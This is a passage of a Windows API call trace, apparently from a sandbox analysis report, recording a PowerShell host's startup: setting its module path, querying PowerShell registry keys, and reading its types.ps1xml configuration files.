	[0145.825] RegCloseKey (hKey=0x324) returned 0x0
	[0145.829] CoTaskMemAlloc (cb=0x20c) returned 0x1b84e930
	[0145.830] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b84e930 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.101] CoTaskMemFree (pv=0x1b84e930) 
	[0146.101] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0146.101] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0146.113] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0146.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.113] CoTaskMemFree (pv=0x190070) 
	[0146.115] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0146.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.115] CoTaskMemFree (pv=0x190070) 
	[0146.126] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0146.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.126] CoTaskMemFree (pv=0x190070) 
	[0146.126] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0146.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.126] CoTaskMemFree (pv=0x190070) 
	[0146.133] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d398 | out: phkResult=0x27d398*=0x32c) returned 0x0
	[0146.134] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x27d3ac, lpData=0x0, lpcbData=0x27d3a8*=0x0 | out: lpType=0x27d3ac*=0x1, lpData=0x0, lpcbData=0x27d3a8*=0x74) returned 0x0
	[0146.135] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x27d31c, lpData=0x0, lpcbData=0x27d318*=0x0 | out: lpType=0x27d31c*=0x1, lpData=0x0, lpcbData=0x27d318*=0x74) returned 0x0
	[0146.135] CoTaskMemAlloc (cb=0x78) returned 0x1b8409b0
	[0146.135] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x27d2ec, lpData=0x1b8409b0, lpcbData=0x27d2e8*=0x74 | out: lpType=0x27d2ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x27d2e8*=0x74) returned 0x0
	[0146.135] CoTaskMemFree (pv=0x1b8409b0) 
	[0146.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x27d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0146.135] SetErrorMode (uMode=0x1) returned 0x1
	[0146.135] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x27d270 | out: lpFileInformation=0x27d270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0146.136] SetErrorMode (uMode=0x1) returned 0x1
	[0146.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x27d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.138] SetErrorMode (uMode=0x1) returned 0x1
	[0146.138] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d270 | out: lpFileInformation=0x27d270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0146.138] SetErrorMode (uMode=0x1) returned 0x1
	[0146.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x27d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0146.142] SetErrorMode (uMode=0x1) returned 0x1
	[0146.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d270 | out: lpFileInformation=0x27d270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0146.142] SetErrorMode (uMode=0x1) returned 0x1
	[0146.347] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0146.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.347] CoTaskMemFree (pv=0x190070) 
	[0146.354] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0146.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.354] CoTaskMemFree (pv=0x190070) 
	[0146.355] GetACP () returned 0x4e4
	[0146.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.374] SetErrorMode (uMode=0x1) returned 0x1
	[0146.375] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0146.848] GetFileType (hFile=0x330) returned 0x1
	[0146.848] SetErrorMode (uMode=0x1) returned 0x1
	[0146.848] GetFileType (hFile=0x330) returned 0x1
	[0146.852] ReadFile (in: hFile=0x330, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.854] ReadFile (in: hFile=0x330, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.855] ReadFile (in: hFile=0x330, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.855] ReadFile (in: hFile=0x330, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x27d1a8*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.855] ReadFile (in: hFile=0x330, lpBuffer=0x2ebaf43, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ebaf43*, lpNumberOfBytesRead=0x27d1a8*=0x0, lpOverlapped=0x0) returned 1
	[0146.855] ReadFile (in: hFile=0x330, lpBuffer=0x2ebbae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2ebbae8*, lpNumberOfBytesRead=0x27d1a8*=0x0, lpOverlapped=0x0) returned 1
	[0146.857] CloseHandle (hObject=0x330) returned 1
	[0146.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x27cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.863] SetErrorMode (uMode=0x1) returned 0x1
	[0146.863] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d120 | out: lpFileInformation=0x27d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0146.863] SetErrorMode (uMode=0x1) returned 0x1
	[0146.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.864] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d208 | out: phkResult=0x27d208*=0x330) returned 0x0
	[0146.864] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d18c, lpData=0x0, lpcbData=0x27d188*=0x0 | out: lpType=0x27d18c*=0x1, lpData=0x0, lpcbData=0x27d188*=0x56) returned 0x0
	[0146.865] CoTaskMemAlloc (cb=0x5a) returned 0x1b84cd80
	[0146.865] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d15c, lpData=0x1b84cd80, lpcbData=0x27d158*=0x56 | out: lpType=0x27d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27d158*=0x56) returned 0x0
	[0146.865] CoTaskMemFree (pv=0x1b84cd80) 
	[0146.865] RegCloseKey (hKey=0x330) returned 0x0
	[0146.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0146.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x27cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.352] GetSystemInfo (in: lpSystemInfo=0x27be40 | out: lpSystemInfo=0x27be40*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.353] VirtualQuery (in: lpAddress=0x27bef0, lpBuffer=0x27cdb0, dwLength=0x30 | out: lpBuffer=0x27cdb0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.557] SetErrorMode (uMode=0x1) returned 0x1
	[0149.557] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0149.557] GetFileType (hFile=0x330) returned 0x1
	[0149.557] SetErrorMode (uMode=0x1) returned 0x1
	[0149.557] GetFileType (hFile=0x330) returned 0x1
	[0150.304] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.304] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.304] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.304] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.304] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.304] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.304] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.304] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.305] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.306] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.306] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.307] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.307] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.307] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.307] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.308] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.308] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.310] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.311] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.311] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.311] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.311] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.312] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.312] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.312] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.312] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.313] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.313] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.313] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.313] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.314] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.314] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.314] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.319] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.319] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.319] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.319] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.320] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.320] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.320] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.320] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0150.321] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x1b4, lpOverlapped=0x0) returned 1
	[0150.321] ReadFile (in: hFile=0x330, lpBuffer=0x2d81948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2d81948*, lpNumberOfBytesRead=0x27d1a8*=0x0, lpOverlapped=0x0) returned 1
	[0150.321] CloseHandle (hObject=0x330) returned 1
	[0150.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x27cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0150.321] SetErrorMode (uMode=0x1) returned 0x1
	[0150.321] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27d120 | out: lpFileInformation=0x27d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0150.321] SetErrorMode (uMode=0x1) returned 0x1
	[0150.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
